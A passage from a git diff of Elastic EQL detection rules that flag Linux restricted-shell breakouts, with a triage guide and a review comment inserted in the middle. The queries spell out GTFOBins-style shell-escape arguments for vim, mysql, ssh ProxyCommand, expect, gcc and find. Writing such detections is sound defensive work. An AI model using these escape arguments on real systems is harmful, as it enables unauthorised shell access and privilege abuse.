(process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", 
\"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;bash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;dash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/sh 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/bash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/dash 0\u003c\u00262 1\u003e\u00262\"))\n )\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised 
hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n (\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in 
(\"byebug\",\"git\",\"ftp\",\"strace\",\"nawk\", \"mawk\", \"awk\", \"gawk\", \"tar\", \"zip\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and 
process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", \"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0<&2 1>&2\", \"ProxyCommand=;bash 0<&2 1>&2\", \"ProxyCommand=;dash 0<&2 1>&2\", \"ProxyCommand=;/bin/sh 0<&2 1>&2\", \"ProxyCommand=;/bin/bash 0<&2 1>&2\", \"ProxyCommand=;/bin/dash 0<&2 1>&2\"))\n )\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -97,7 +97,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_106.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_106.json index 6f36a8350c1..d9a9f8a4484 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_106.json 
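Review bot: In the `query` on the new side, the block commented `/* shells specified in args */` mixes `and` and `or` without grouping, so the `sensible-pager` / `apt changelog` branch is evaluated on its own rather than under the `process.args in (...)` shell check (EQL gives `and` precedence over `or`); the `_106` snapshot later in this diff resolves this by wrapping both alternatives as `(process.args : "*sh" and ( ... or ... ))`. The re-encoding in this hunk does not touch that logic, and if `_105` is a frozen historical version of the rule the correction belongs upstream rather than in this file. The analyst-facing `note` field also carries a number of spelling errors on the new side (`suspricous`, `MITTRE`, `revelaed`, `renebaling`, `crednetials`, among others), repeated in the `_106` and `_107` sections below; since these files appear to be exported from the rules source, fixing them there would propagate into the next release.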
@@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect 
the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"*awk\", \"git\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or 
(process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\" and process.parent.args == \"-p\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0\u003c\u00262 1\u003e\u00262\")\n)\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux 
Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host 
and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"*awk\", \"git\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == 
\"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\" and process.parent.args == \"-p\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -106,7 +106,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_107.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_107.json
index a7b8fcf8b10..2c937b6bdcc 100644
--- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_107.json
@@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect 
the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"*awk\", \"git\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or 
(process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\" and process.parent.args == \"-p\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\")) or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : 
\"ProxyCommand=;*sh 0\u003c\u00262 1\u003e\u00262\")\n)\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - 
Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"*awk\", \"git\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* 
shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\" and process.parent.args == \"-p\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\")) or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", "references": [ 
"https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -106,7 +106,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_108.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_108.json index b8dc303ab9e..21e4f80af43 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_108.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_108.json 
@@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like 